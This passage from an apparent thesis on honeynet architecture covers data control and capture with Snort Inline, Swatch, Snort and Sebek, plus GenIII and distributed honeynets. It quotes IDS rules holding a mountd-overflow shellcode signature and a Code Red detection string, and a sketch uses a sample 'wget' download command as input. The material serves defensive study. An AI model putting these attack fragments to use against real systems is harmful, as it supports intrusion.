modified. As a result, the malicious payload can be rendered ineffective. An example of
a PRM rule that mutates the exploit code of the NFS mountd buffer overflow attack is
shown in Listing 3.1 (cmp. Caswell et al., 2007, p. 614). The attack targets a running
NFS (Network File System) server on port 635 which is frequently used to share files over
the network (see CERT, 1998). By overwriting an internal memory buffer, an adversary
may spawn a remote shell and execute arbitrary code with administrative privileges.
Thereby, full control of the underlying system platform may be gained.
Figure 3.6: Packet Drop Mode (PDM) of Snort Inline
3 see http://snort-inline.sourceforge.net/
1 alert udp $EXTERNAL_NET any -> $HOME_NET 635
2 (msg:"EXPLOIT x86 Linux mountd overflow";
3 content:"|EB56 5E56 5656 31D2 8856 0B88 561E|";
4 replace:"|6565 6565 6565 6565 6565 6565 6565|";
5 reference:cve,CVE-1999-0002;
6 reference:bugtraq,121;
7 classtype:attempted-admin;
8 sid:316; rev:3;)
Listing 3.1: Sample Rule for the Packet Replace Mode (PRM) of Snort Inline
As can be seen on Line 3 of Listing 3.1, the exploit can be identified with the data
sequence EB56 5E56 5656 31D2 8856 0B88 561E. If the string is observed in a packet
stream, it is automatically replaced with a number of tokens, in this case, a series of
simple e letters with the corresponding hexadecimal value 0x65. As a consequence,
the shellcode cannot be successfully executed any longer, and the compromise attempt
fails (see also Caswell et al., 2007).
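The replacement step itself can be reproduced with a short sketch. The code below does not use Snort Inline; it merely applies the byte pattern and the substitute of equal length from Listing 3.1 to a payload. The function name and the sample payload are assumptions made for illustration.

```python
# Byte pattern taken from the content option of Listing 3.1 (14 bytes).
SIGNATURE = bytes.fromhex("EB565E56565631D288560B88561E")
# Substitute of the same length, consisting of the letter e (0x65) only.
REPLACEMENT = b"\x65" * len(SIGNATURE)


def replace_payload(payload: bytes) -> bytes:
    """Overwrite every occurrence of the signature; the length stays unchanged."""
    return payload.replace(SIGNATURE, REPLACEMENT)


# Made-up payload: two padding bytes, the signature, and a trailing string.
payload = b"\x90\x90" + SIGNATURE + b"/bin/sh"
mutated = replace_payload(payload)
print(mutated)
```

Because the substitute has exactly the same length as the signature, the packet size is preserved, and only the instructions of the exploit are destroyed.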
Writing PRM rules requires a thorough knowledge and deep understanding of the
individual exploit functions (see Honeynet Project, 2004b). On the other hand, the
technology facilitates observing intruders for longer periods of time: As Provos and Holz
(2007, p. 65) point out, “given the difficulties of making exploits work in the wild (...),
there is a high probability that intruders would not detect the presence of the Honeywall
for some time and therefore continue to try different forms of attacks”.
3.2.2 Data Capture Implementations
Similar to data control implementations, security professionals rely on multiple data
capture layers in order to study the behavior and intentions of adversaries. The prevalent
tools and applications that are required for these tasks are presented in more detail in
the following sections.
• IPTables and Swatch
We have already introduced IPTables as a powerful data control mechanism. Due to its
sophisticated routing and filtering capabilities, risks for uninvolved third parties can be
mitigated. On the other hand, the software may be effectively used for data capturing
activities as well: In cooperation with the syslogd daemon of the operating system,
network connections can be logged to the file /var/log/messages. More importantly,
with the help of Swatch, it is possible to automatically send email messages about specific
events within the honeynet. Thus, administrators are able to quickly react to incidents,
if this proves to be necessary.
1 watchfor /Firewall: OUTBOUND CONNECTION/
2     echo normal
3     mail=admin@honeynet.org,subject=Outbound Connection
4
5     # limit the number of email alerts to one message per hour
6     throttle 1:0:0
Listing 3.2: Example of a Swatch Configuration File
Swatch4 (Simple Watcher) is a Perl-based utility that was developed by Todd Atkins
for monitoring system log files in real time (see Hansen and Atkins, 1993). When a new
log record is created, it is matched against certain patterns that are listed in the main
configuration file of the application. A pattern can be a simple word or a more complex
regular expression (see Bauer, 2001). If a match is found, a notification procedure is
triggered, and an alert is mailed to a pre-defined contact person. For instance, in the
sample configuration file shown in Listing 3.2, the supervisor of a honeynet is informed
about outbound network connections. These types of messages must generally be taken
seriously, because they potentially indicate the successful compromise of a decoy (cmp.
Honeynet Project, 2004b). However, for maintenance reasons, we recommend limiting
the number of generated warnings with the throttle keyword, as illustrated in Line 6 of
Listing 3.2 (see also Spitzner, 2000). Thus, Swatch solely sends a summary report about
logged elements in a given time interval, in our case, a period of one hour. In
our experience, this value is acceptable for responding to security-related occurrences
within the honeynet in time.
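The combination of pattern matching and throttling can be sketched as follows. The example is not derived from the Swatch source code; the ThrottledWatcher class, its method, and the sample log lines are hypothetical and only model the behavior described above.

```python
import re


class ThrottledWatcher:
    """Matches log lines against a pattern, alerting at most once per interval."""

    def __init__(self, pattern: str, throttle_seconds: int = 3600) -> None:
        self.pattern = re.compile(pattern)
        self.throttle_seconds = throttle_seconds
        self.last_alert = None   # time of the most recent alert, if any
        self.suppressed = 0      # matches withheld since the last alert

    def process(self, line: str, now: float):
        """Return an alert text, or None if there is no match or the alert is throttled."""
        if not self.pattern.search(line):
            return None
        if self.last_alert is not None and now - self.last_alert < self.throttle_seconds:
            self.suppressed += 1
            return None
        self.last_alert = now
        return f"ALERT: {line.strip()}"


watcher = ThrottledWatcher(r"Firewall: OUTBOUND CONNECTION")
first = watcher.process("kernel: Firewall: OUTBOUND CONNECTION SRC=192.168.1.2", 0.0)
second = watcher.process("kernel: Firewall: OUTBOUND CONNECTION SRC=192.168.1.2", 100.0)
third = watcher.process("kernel: Firewall: OUTBOUND CONNECTION SRC=192.168.1.2", 3700.0)
```

In this run, the first and third record trigger an alert, while the second one falls into the throttle interval and is only counted.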
• Snort
The open source network intrusion detection system (NIDS) Snort5 forms the second
data capturing layer on the Honeywall. It supports two different runtime modes: In
packet sniffing and logging mode, Snort records all traffic flows that are about to enter
or leave the honeynet. Data streams are saved as raw binary files. Thereby, the data
capture process is significantly accelerated, because network packets are not converted
into a human-readable format first (see Caswell et al., 2007). In addition, the generated
files can be directly imported into network analysis and forensic applications such as
Tcpdump6 or Wireshark7 . As we will see in Chapter 5, these applications are very
powerful and greatly facilitate the investigation of an incident. For example, it is possible
to restore an FTP session that was initiated in the course of a system compromise and
recover the steps of the intruder.
4 see http://swatch.sourceforge.net/
5 see http://www.snort.org/
6 see www.tcpdump.org/
7 see www.wireshark.org/
1 # rule header
2 alert tcp $EXTERNAL_NET any -> $INTERNAL_NET 80
3
4 # rule options
5 (msg:"WEB-IIS CodeRed v2 root.exe access";
6 flow:to_server,established;
7 uricontent:"/root.exe"; nocase;
8 reference:url,www.cert.org/advisories/CA-2001-19.html;
9 classtype:web-application-attack;
10 sid:1256; rev:8;)
Listing 3.3: Sample Rule of the Snort Intrusion Detection System
When running in intrusion detection mode, Snort inspects each packet based on a list
of attack-specific detection rules in order to discover potentially dangerous operations.
A detection rule consists of a header and corresponding rule options. The header defines
the action that is taken in case a threat is discovered, the transport protocol used by
the packet, as well as basic IP and port matching criteria. The rule option section
contains processing-related instructions and metadata information, e.g., references to
relevant security advisories (cmp. Caswell et al., 2007). A complete overview about the
individual rule components is given by Sourcefire (2009).
An example of a Snort rule is shown in Listing 3.3 (cmp. Caswell et al., 2007, p. 302).
It affects TCP-specific traffic flows that originate from an arbitrary port of an external host and
are destined for web servers running on port 80. As can be seen on Line 7, suspicious
packets are identified by the string /root.exe, a fingerprint of the Code Red worm. The
worm caused severe havoc in 2001 and is still propagating in the wild at the time of this
writing (cmp. CERT, 2001a,b, and Chapter 5). If the string pattern is detected, an alert
message is generated on the Honeywall (cmp. Line 2 of Listing 3.3), and the incident is
logged.
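The checks performed by this rule can be approximated in a few lines. The sketch below is not Snort code and ignores details such as URI normalization; the function name and its parameters are assumptions chosen for illustration.

```python
def matches_root_exe_rule(protocol: str, dst_port: int, established: bool,
                          request_line: str) -> bool:
    """Approximate the header, flow, and uricontent checks of the sample rule."""
    # Rule header and flow option: established TCP traffic to port 80.
    if protocol != "tcp" or dst_port != 80 or not established:
        return False
    # The URI is the second element of an HTTP request line.
    parts = request_line.split()
    if len(parts) < 2:
        return False
    uri = parts[1]
    # nocase: the comparison ignores upper and lower case.
    return "/root.exe" in uri.lower()


hit = matches_root_exe_rule("tcp", 80, True, "GET /scripts/root.exe?/c+dir HTTP/1.0")
miss = matches_root_exe_rule("tcp", 80, True, "GET /index.html HTTP/1.0")
print(hit, miss)
```

A request for /scripts/root.exe is flagged regardless of its capitalization, whereas an ordinary page request passes without an alert.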
However, it is important to note that worm attacks and particularly new types of
malicious activities can only be properly recognized if the Snort rule set is carefully kept
up to date at all times. With the help of Oinkmaster8 that is part of the Honeywall,
this process can be significantly facilitated. Oinkmaster automatically downloads the
latest signatures from a pre-defined rule repository (see Östling, 2006). It is capable of
importing both the official, high-quality definitions that are commercially distributed by
the Vulnerability Research Team (VRT)9 as well as slightly reduced versions that are
provided free of charge by members of the Snort community10.
A severe downside of intrusion detection systems is their inability to cope with encrypted network traffic (cmp. Honeynet Project, 2004b). Consequently, if adversaries
establish connections over secure protocols such as TLS (Transport Layer Security) or
SSL (Secure Sockets Layer), penetration attempts cannot be reliably monitored any
longer. In order to solve this problem, a third data capture layer needs to be implemented. A description of this layer is the subject of the next section.
8 see http://oinkmaster.sourceforge.net/
9 see http://www.snort.org/vrt/buy-a-subscription
10 see http://www.snort.org/snort-rules
• Sebek
As participants of the Honeynet Project (2004b) explain, intruders frequently use encryption techniques to protect their communication channels from network surveillance
devices. Common cryptographic algorithms such as AES (Advanced Encryption Standard, see NIST, 2001) or 3DES (Triple Data Encryption Standard, see NIST, 1999) are
extremely difficult to break, even though a number of attack strategies have been developed more recently (see Bernstein, 2005; Osvik et al., 2006; Lucks, 1998). In spite of
these efforts, the algorithms are considered to be secure at the time of this writing. Thus,
to effectively observe the behavior of adversaries, security professionals must circumvent
the respective encryption routines. The open source utility Sebek11 makes these types of
operations comparatively easy by intercepting network packets after they have passed
the decryption engine of the operating system (see Honeynet Project, 2003c). It is available free of charge for different system platforms, including Linux, Microsoft Windows,
OpenBSD, and Solaris. In the scope of this thesis, we focus on the Linux-based version
of the software, although the concepts outlined below can also be applied to most other
platforms.
With respect to its system architecture, Sebek consists of a client and a server component. The client must be installed on each decoy within the honeynet. In contrast,
the server runs within a central location on the Honeywall.
On the side of the client, Sebek is capable of collecting extensive information about
attackers. In particular, the application can record the keystrokes of miscreants as well
as recover the tools that were transferred to a honeypot in the course of a compromise.
For these purposes, the internal System Call Table of the kernel must be manipulated.
To be more precise, Sebek redirects specific system calls, e.g., to the internal read()
or open() function, to its own data handling procedure. Thus, when a system call is
invoked, the respective data stream can be logged, before control is passed back to the
operating system. This process is illustrated in Figure 3.7.
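The redirection principle can be imitated in user space with a table of function references. The following sketch is only an analogy and has nothing in common with the kernel code of Sebek: the dictionary syscall_table, the function names, and the sample input are hypothetical.

```python
import io

captured = []  # data recorded by the monitoring wrapper


def original_read(stream: io.BytesIO, size: int) -> bytes:
    """Stand-in for the original read() implementation."""
    return stream.read(size)


# Hypothetical "system call table": maps call names to their handlers.
syscall_table = {"read": original_read}


def install_hook(table: dict, name: str) -> None:
    """Replace a table entry with a wrapper that logs and then delegates."""
    original = table[name]

    def hooked(stream, size):
        data = original(stream, size)   # invoke the original handler
        captured.append(data)           # record what the caller will receive
        return data                     # pass the unchanged result back

    table[name] = hooked


install_hook(syscall_table, "read")
result = syscall_table["read"](io.BytesIO(b"wget http://example.org/tool.tgz\n"), 4)
print(result, captured)
```

The caller receives exactly the data it requested, while a copy is retained by the wrapper without the caller noticing.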
The captured data is wrapped in a notification packet and is sent unidirectionally
across the network to the server for further analysis (cmp. Figure 3.8). Once it reaches
its destination, it may either be stored in a relational database, or it can be directly
processed on the command line with the sbk_extract and sbk_ks_log.pl utilities. For example, to inspect Sebek packets that arrive on the interface eth0 and are destined for port 1101, we must
execute the utilities as follows:
sbk_extract -i eth0 -p 1101 | sbk_ks_log.pl
11 see http://www.honeynet.org/tools/sebek/
Figure 3.7: Redirection of System Calls in the Sebek Monitoring Software
(Source: Based on Honeynet Project, 2003c)
Figure 3.8: Covert Data Channel Used by the Sebek Monitoring Software
(Source: Based on Honeynet Project, 2003c)
To mitigate the risk of detection, Sebek uses several mechanisms to hide its presence
from the eyes of probing blackhats: First, with the help of a cleaning component, the
application is removed from the list of loaded kernel modules. Second, the software
implements its own raw socket interface. As a consequence, the TCP/IP stack of the
operating system can be completely bypassed, and notification packets cannot be blocked
by firewall devices such as IPTables any longer. In addition, Sebek can be configured to
store a so-called magic value and a specific destination port number inside each packet.
If another system within the honeynet finds such a packet, the packet is silently ignored. Thus,
a covert channel is created, and intruders are unable to discover the data transfer even
if a network sniffing program such as Tcpdump is run.
In spite of these features, adversaries have attempted to exploit architectural weaknesses in the Sebek client more recently in order to reveal the monitored environment.
For instance, Madsys (2003) presented a brute force algorithm that is capable of finding traces of the Sebek module header in memory (see also Holz and Raynal, 2005a).
With similar memory inspection techniques, sensitive configuration parameters of the
keystroke logging utility could be disclosed or even changed (see Corey, 2004). These
parameters are also likely to be found when specific heuristic algorithms are applied (see
Dornseif et al., 2004b; Holz and Raynal, 2005a).
A different detection strategy was demonstrated in the work of Dornseif et al. (2004a)
with their proof of concept application Kebes: The software uses the mmap() function of
the system kernel to map the contents of a file directly into the internal address space.
As a result, logging operations could be fully circumvented, because the read() system
call was not invoked at any time. In addition, Keong (2004) succeeded in restoring the
original System Call Table on Microsoft Windows operating systems. In consequence,
Sebek could be completely disabled.
As can be seen, even sophisticated logging and monitoring technologies can often
be bypassed or actively manipulated by savvy attackers. Again, this highlights the
fact that multiple data capture layers are required for collecting extensive information
about Internet miscreants (cmp. Honeynet Project, 2004b). On the other hand, GenII
honeynets do not specify how this information is to be stored or accessed in a later
analysis (see Balas and Viecco, 2005). What is worse, many tools define their own data
format without considering relationships to other data capture sources. Due to these
incompatibilities, investigations of security-related incidents are made more difficult.
Therefore, second generation honeynets have been superseded by more organized and
structured architectures. We will take a closer look at these innovations in the following
section.
3.3 GenIII Honeynets
In 2004, members of the Honeynet Project started the development of a more advanced
type of honeynets (cmp. Honeynet Project, 2005d). These so-called GenIII honeynets
are commonly deployed today and facilitate watching and analyzing malicious activities
on the Internet. They implement all the features of preceding technologies, including the
transparent network bridging, data control, and data capture capabilities. In comparison
to GenII honeynets, however, they are significantly easier to set up. With the bootable
CD-ROM Roo12, the entire Honeywall can be automatically installed to hard disk within
minutes. At the end of the installation process, security professionals may then launch
a graphical user interface in order to configure the individual components. Hence, a
fully working honeynet gateway can be deployed within a short amount of time (see also
Provos and Holz, 2007, and Chapter 5).
In addition, several new applications that are part of the Roo CD greatly support
post-incident investigations (cmp. Balas and Viecco, 2005): For example, Argus13 (Audit
Record Generation and Utilization System) is a monitoring system that processes all traffic
in real time. In contrast to IPTables or Snort, it is able to delimit single network flows.
A flow is a set of packets that are bi-directionally transferred between two computer
systems (cmp. Handelman et al., 1999; Paxson et al., 1998). Each flow is characterized
by a start and end time and contains qualitative information such as the destination
and source address, as well as quantitative information, e.g., the number of transmitted
bytes and packets (see Brownlee et al., 1997; QoSient, 2006). As a result, system probes
and penetration attempts can be clearly separated from other, unrelated events in the
honeynet and examined in more detail.
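The notion of a flow can be made concrete with a short aggregation routine. The sketch below does not reflect the record format of Argus; the Flow class, the tuple layout of the input, and the sample packets are assumptions made for illustration.

```python
from dataclasses import dataclass


@dataclass
class Flow:
    start: float           # time of the first packet
    end: float             # time of the last packet
    packet_count: int = 0
    byte_count: int = 0


def flow_key(src: str, sport: int, dst: str, dport: int, proto: str) -> tuple:
    """Order the two endpoints so that both directions share one key."""
    a, b = (src, sport), (dst, dport)
    return (proto,) + (a + b if a <= b else b + a)


def aggregate(packets: list) -> dict:
    """Group (time, src, sport, dst, dport, proto, size) tuples into flows."""
    flows = {}
    for ts, src, sport, dst, dport, proto, size in packets:
        key = flow_key(src, sport, dst, dport, proto)
        flow = flows.setdefault(key, Flow(start=ts, end=ts))
        flow.start = min(flow.start, ts)
        flow.end = max(flow.end, ts)
        flow.packet_count += 1
        flow.byte_count += size
    return flows


sample = [
    (1.0, "10.0.0.5", 1025, "192.168.1.2", 22, "tcp", 60),
    (1.5, "192.168.1.2", 22, "10.0.0.5", 1025, "tcp", 60),
    (2.0, "10.0.0.5", 1025, "192.168.1.2", 22, "tcp", 100),
    (3.0, "10.0.0.9", 4000, "192.168.1.2", 80, "tcp", 40),
]
flows = aggregate(sample)
ssh_flow = flows[flow_key("10.0.0.5", 1025, "192.168.1.2", 22, "tcp")]
```

The three packets of the SSH session are merged into a single bidirectional flow, whereas the unrelated web request forms a flow of its own.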
With the passive fingerprinting utility p0f14, it is possible to determine the operating
system of a remote host (cmp. Zalewski, 2005). When a connection is initiated with
a honeypot, inbound network packets are intercepted on the level of the Honeywall,
before they are forwarded to the respective machine. By finding subtle discrepancies in
the packet headers, p0f is then capable of creating a unique fingerprint of the host and
identifying the system platform in question. For these purposes, the packet metrics as
illustrated in Table 3.3 have proven helpful (see also Honeynet Project, 2002b; Stevens,
1994).
Compared to other fingerprinting tools such as nmap15 or xprobe16, these operations
are often slightly less accurate, because p0f solely processes captured network data and
does not actively interact with the target system (see Zalewski, 2006). On the other
hand, due to this characteristic, the utility cannot be detected either and, therefore,
perfectly meets the requirements of the Honeynet Project (2004a).
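How a single metric contributes to a passive fingerprint can be shown with the TTL value. The sketch below is a strong simplification and does not use the signature database of p0f: the list of initial values and the mapping to platforms are commonly cited defaults that we assume for illustration only.

```python
# Assumption: frequently used initial TTL values.
COMMON_INITIAL_TTLS = (32, 64, 128, 255)

# Illustrative hints only; real signatures combine many more packet fields.
TTL_HINTS = {
    64: "Linux/Unix-like",
    128: "Windows",
    255: "network device or Solaris",
}


def estimate_initial_ttl(observed_ttl: int) -> int:
    """Assume the sender started at the smallest common value >= observed."""
    for candidate in COMMON_INITIAL_TTLS:
        if observed_ttl <= candidate:
            return candidate
    raise ValueError("TTL must not exceed 255")


def guess_platform(observed_ttl: int) -> tuple:
    """Return a platform hint and the estimated number of intermediary hops."""
    initial = estimate_initial_ttl(observed_ttl)
    hops = initial - observed_ttl
    return TTL_HINTS.get(initial, "unknown"), hops


print(guess_platform(57))
print(guess_platform(116))
```

A single field is obviously not sufficient for a reliable identification; the estimate only becomes meaningful in combination with the other metrics.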
Another crucial component in GenIII honeynets is the hflow daemon. It continually
interacts with different data capture sources, including Snort, Sebek, Argus, and p0f, to
create a unified data set that is independent from application-specific format definitions
(see Balas and Viecco, 2005). The information is hierarchically structured and stored in
a relational database. Thus, alerts of the intrusion detection system can, for instance,
be correlated with processes and network flows. As a consequence, causal relationships
between logical entities can be quickly discovered. Therefore, the approach provides
“a more comprehensive representation of events” in contrast to GenII honeynets, as
Balas and Viecco (2005, p. 4) argue.
12 see https://projects.honeynet.org/honeywall/
13 see http://www.qosient.com/argus/
14 see http://lcamtuf.coredump.cx/p0f.shtml
15 see http://insecure.org/nmap/
16 see http://sourceforge.net/projects/xprobe
Metric                  Description
TTL Value               The value of the Time to Live (TTL) field in the header of a network packet is decreased whenever an intermediary device is passed. Once it reaches zero, the packet is discarded to prevent infinite loops. Because system vendors use different initial values for the field, an analysis of the TTL value may help reveal the system platform of the host (see also SWITCH, 2002).
Don’t Fragment Flag     If the Don’t Fragment (DF) flag is set, a network packet is dropped in case it cannot be forwarded to another device without fragmentation. This flag is not used by older operating systems.
IPID Value              The value of the IP Identification (IPID) field uniquely identifies a fragmented packet. In various operating system implementations, this field is always set to zero.
ToS Value               With the help of the Type of Service (ToS) field, the preferred routing method can be indicated, e.g., to minimize network delays or maximize reliability. However, on most operating systems, this field is set to a fixed value.
Window Size             The Window Size determines the number of bytes that can be sent without acknowledgement. The value often corresponds to the Maximum Segment Size (MSS) of a packet.
Urgent Pointer Value    The value in the Urgent Pointer field must be set to zero unless the URG flag is set in the header of a network packet. However, in some platform implementations, this field is always initialized with a nonzero value.
Table 3.3: Metrics Used by the p0f Passive Fingerprinting Utility
(Source: Based on Zalewski, 2005; Stevens, 1994)
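The benefit of a unified relational data set for correlating alerts, flows, and host activity can be illustrated with an in-memory database. The schema below is entirely hypothetical and does not correspond to the tables created by hflow; the table names, columns, and sample records are assumptions made for this sketch.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE flows (flow_id INTEGER PRIMARY KEY, src_ip TEXT, dst_ip TEXT,
                        dst_port INTEGER, os_guess TEXT);
    CREATE TABLE alerts (alert_id INTEGER PRIMARY KEY, flow_id INTEGER, message TEXT);
    CREATE TABLE keystrokes (flow_id INTEGER, command TEXT);
""")

# Made-up records from three different data capture sources.
conn.execute("INSERT INTO flows VALUES (1, '10.0.0.5', '192.168.1.2', 80, 'Windows')")
conn.execute("INSERT INTO flows VALUES (2, '10.0.0.9', '192.168.1.2', 22, 'Linux')")
conn.execute("INSERT INTO alerts VALUES (1, 1, 'WEB-IIS CodeRed v2 root.exe access')")
conn.execute("INSERT INTO keystrokes VALUES (1, 'whoami')")

# A single query relates an IDS alert to its flow and to the logged keystrokes.
rows = conn.execute("""
    SELECT f.src_ip, f.os_guess, a.message, k.command
    FROM alerts a
    JOIN flows f ON f.flow_id = a.flow_id
    LEFT JOIN keystrokes k ON k.flow_id = f.flow_id
""").fetchall()
print(rows)
```

With a shared flow identifier, one join suffices to connect the observations of otherwise independent tools.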
For administrative purposes, the data may be remotely accessed over the web-based interface Walleye. Walleye permits generating various summary and status reports about
activities within the honeynet (see also Honeynet Project, 2005d). The software also
supports exporting selected traffic flows in raw network format. As we will see in Chapter 5, these features enable security professionals to perform offline forensic investigations
with external applications such as Honeysnap17 which is used to efficiently recover attack
tools and clear text communications of adversaries. Last but not least, Walleye greatly
facilitates maintaining and configuring most parts of the Honeywall. For instance, it is
possible to restart stalled processes or completely shut down the gateway to block all
incoming and outgoing connections. Hence, administrators can stay in control of their
decoys at all times and are able to mitigate risks for the external environment as best
as possible.
3.4 Virtual Honeynets and Future Implementations
A large honeynet can be complex and expensive to administer if each honeypot is
installed on its own physical machine. An alternative approach is the use of virtualization techniques similar to those described in Chapter 2. As we have explained, these
techniques can help keep hardware costs down and make the deployment of a virtual
honeynet easier (cmp. Provos and Holz, 2007).
Even though a virtual honeynet may be built on a single system, a hybrid solution
is more common in practice to date (cmp. Honeynet Project, 2003b). In this case, the
individual honeypots are deployed within virtual machines, while the Honeywall is run
on a dedicated machine (cmp. Figure 3.9). This architecture has several advantages
(see also Honeynet Project, 2004b): First, the implementation is more secure, because
the Honeywall is physically isolated from the electronic baits. Thus, even if an attacker
successfully compromises a virtual machine, the danger of getting privileged access to
the honeynet gateway is comparatively small.
Figure 3.9: Example of a Hybrid Virtual Honeynet
(Source: Based on Honeynet Project, 2003b)
17 see http://www.honeynet.org/tools/honeysnap/index.html
Figure 3.10: Example of a Distributed Honeynet (Source: Based on Spitzner, 2003c)
Second, the Honeywall operates independently from the honeypots. Consequently, its
performance level is not reduced when additional decoys are installed and physical resources
must be shared among a larger number of virtual machines. For these reasons, we
favor the hybrid-based type in the scope of this thesis. A description of the corresponding
setup process is the subject of Chapter 5.
A new variant of honeynets is still in development at the time of this writing. The
idea of these so-called distributed honeynets is the observation of adversaries on a large
scale, while minimizing costs and maintenance efforts at the same time (cmp. Honeynet
Project, 2004b). Although these objectives may appear contradictory at first sight, the
concept may be realized with honeypot farms. A honeypot farm is a consolidated network
of electronic baits running at a single location (see Spitzner, 2003c). It serves as a central
monitoring station for multiple, virtually distributed honeypots: With the help of a so-called virtual private network (VPN), administrators of smaller honeynets transparently
redirect their traffic to the honeypot farm. As a result, an attacker is tricked into believing that
she is interacting with a specific network segment, while in reality, she is targeting machines
which are possibly deployed in a completely different part of the world. An illustration
of these operations is shown in Figure 3.10.
In comparison to traditional honeynets, the distributed architecture offers several
advantages (see Honeynet Project, 2004b; Spitzner, 2003c): On the one hand, security
professionals are able to quickly react to new threats, because resources, knowledge,
and expertise can be concentrated at the honeypot farm. On the other hand, the level
of involvement and risk of participating networks is decreased, because traffic flows
solely need to be forwarded. Consequently, these networks are not directly affected by
malicious activities.
However, it is also important to note that the technology is complex and challenging
(cmp. Honeynet Project, 2004b). Because traffic redirection causes network latencies,
suspicion may be raised on the side of intruders. In addition, global time synchronization
and data sanitization issues have to be addressed as well. If these problems are properly
solved though, a new generation of honeynets is likely to be released. For evaluation
purposes, a preliminary version can already be downloaded from the official web page
of the project18.
3.5 Summary
This chapter provided an introduction to honeynet technology. A honeynet is a group
of honeypots that are set up and interconnected in an isolated, non-productive network
segment. In contrast to a single electronic bait, the architecture enables security professionals to observe adversaries on a larger scope and gain extensive information about
tools, tactics, and motives of adversaries. However, it is significantly more complex to
maintain and control, and potentially poses a severe threat to the external environment.
In order to minimize risks for uninvolved third parties as best as possible, we have
presented three central standards that must be carefully taken into consideration in the
deployment phase of a honeynet: First, data control mechanisms must ensure malicious
activities are safely contained within the honeynet. Second, data capture facilities need to
record suspicious traffic without raising the attention of attackers. Third and last, data
analysis technologies must facilitate network forensic and post-incident investigations.
As we have pointed out, the technical implementation of these standards has changed
over time and varies in different honeynet generations: GenI honeynets are only interesting for historical purposes. They solely provide rudimentary data control and data
capture functions and are comparatively easy to detect. GenII honeynets can greatly
mitigate these disadvantages by deploying a transparent bridge, the so-called Honeywall,
that is capable of stealthily intercepting inbound and outbound network connections.
Moreover, the device includes several data control as well as data capture layers: With
the help of the IPTables packet filtering software and the Snort Inline intrusion prevention system, it is possible to block or disable malicious packets going out of the honeynet.
Furthermore, the rule-based intrusion detection system Snort is able to record traffic
flows and identify penetration attempts at the network perimeter. Last but not least,
the monitoring utility Sebek permits capturing both the keystrokes and attack tools of
adversaries. It is directly installed on a decoy and regularly sends logged information
over a covert channel to the honeynet gateway.
One downside of GenII implementations is their heterogeneous data sources and data
formats. Due to subtle incompatibilities between the different components, investigations of security-related incidents are complex and time-consuming. These issues are
addressed in GenIII honeynets by uploading the collected data to a central database.
The database can be comfortably accessed with the web interface Walleye.
In comparison to preceding technologies, GenIII honeynets are also easier to set up and
administer. With the bootable CD-ROM Roo, the Honeywall can be automatically
installed within minutes. In many cases, administrators use a dedicated machine for
these purposes, while they run the individual honeypots within virtual machines. This
hybrid approach permits keeping hardware costs down and reducing maintenance efforts.
18 see http://distributed.honeynets.org/
We have also briefly described the fundamentals of distributed honeynets, an advanced
type of honeynets that is still in development at the time of this writing. By redirecting
traffic from smaller networks to a honeypot farm, it is hoped intruders can be watched
on a large scale. Despite this promise, the architecture has to cope with various
challenges such as latency and time synchronization problems. For this reason, it must
be thoroughly evaluated, before a new generation of honeynets can be released.
The concepts outlined in the previous sections serve as a theoretical foundation for
our own honeynet implementation that is illustrated in detail in Chapter 5. In addition,
we present a so-called Live CD that makes the deployment phase of electronic baits
easier and helps security professionals collect autonomously spreading worms, viruses,
and other types of self-propagating malware. The development process of this CD is the
subject of the following chapter.
4 Development of a Live CD-Based Honeypot
Deploying a larger number of honeypots can be complex and laborious (cmp. Mokube
and Adams, 2007; Sadasivam et al., 2005). Operating systems as well as specific vulnerable services need to be installed, and monitoring devices must be adequately tuned.
Moreover, many actions have to be repeated multiple times during the configuration process, e.g., setting network parameters or creating user accounts. These administrative
tasks are time-consuming but do not lead to a significant increase in knowledge and
expertise in the long term. With the help of a so-called Live CD, deployment and initialization of electronic decoys can be automated to a great extent, thus facilitating the
work of security professionals and permitting them to focus on computer crime-related
incidents.
A Live CD comprises a complete operating system as well as a number of selected applications and “is typically designed to boot and run entirely from a read-only medium”
(Negus, 2007, p. 7). At runtime, data is copied to and solely modified in volatile memory.
When the system is shut down or rebooted, all changes are reset. These characteristics
make Live CDs perfectly suited for honeypot-based research, as a decoy can be quickly
put back online after a compromise without major modifications.
In the course of this thesis, we develop our own derivative of such a CD. End-users are
able to boot our disk and start a pre-configured, fully working low-interaction honeypot
with a simple click. Thereby, it is possible to deploy numerous electronic baits and
collect data on a large scale within a short amount of time.
With respect to the development process, it is important to note that we do not have
to create our system from scratch. At the time of this writing, more than 300 different
Live CDs are already available (see Brand, 2007). For this reason, we may use an existing
distribution and remaster it according to our requirements, i.e., we substantially change
the base of the system and adapt existing features to our needs.
Evaluating every available CD in order to choose an appropriate candidate would be beyond
the scope of this thesis, though. We are not aware of any scientific work on the relative performance of
Live CDs either. Therefore, we only assess the most popular versions as listed by Jordan
(2006) and select the most promising distribution as a starting point for our remastering
project.
This chapter is organized as follows: In the upcoming section, we give a short overview
of the most prevalent Live CDs. We assess the different distributions according
to a set of pre-defined decision attributes and select the candidate that best matches
our requirements. The corresponding evaluation and selection model is subject of Section 4.2. A description of the development and remastering process of our own Live CD
is presented in the third section of this chapter. With the help of a preliminary but
fully-working prototype, we are able to capture autonomously spreading malware on a
large scale and analyze threats that are commonly found on the Internet at the time of
this writing. A summary of the results of our research is given in Section 4.3.4.
4.1 Overview about Popular Live CD Distributions
According to Jordan (2006), the top Live CD distributions are Knoppix, Kanotix, SimplyMEPIS, PCLinuxOS, Slax, and Ubuntu. We briefly illustrate the major characteristics
and features of these CDs in the following.
• Knoppix: Knoppix1 is a popular free Live CD developed by Klaus Knopper and is
regarded as “the most mature and widely used bootable Linux CD” (Negus, 2007,
p. 24). Software packages include a complete desktop environment with office,
Internet, and multimedia applications. Hardware support and compatibility are
excellent (cmp. FrozenTech, 2004b).
Due to its extensive modification possibilities (FrozenTech, 2005a) and a vibrant community, a lot of other distributions are derived from Knoppix, e.g., the module-based version Morphix2 or Knoppix-STD3, a Live CD that provides a vast collection
of security tools and addresses the needs of system administrators as well as penetration testers.
• Kanotix: Kanotix4 is a Debian-based Live CD and free of charge. It is especially
known for its outstanding hardware support (see FrozenTech, 2004b) and contains
a lot of additional software packages.
Remastering Kanotix is possible but quite difficult, because only little official
documentation exists.
• SimplyMEPIS: In contrast to many other Linux distributions, SimplyMEPIS5 is a
commercial Live CD developed by Warren Woodford. The latest version is based
on Ubuntu (see below).
1 see http://www.knoppix.org/
2 see http://www.morphix.org/
3 see http://s-t-d.org/
4 see http://kanotix.com/
5 see http://www.mepis.org/
One of the exceptional features of SimplyMEPIS is its ability to be used not only as
a Live CD, but as an entire operating system installed to hard disk. It is primarily
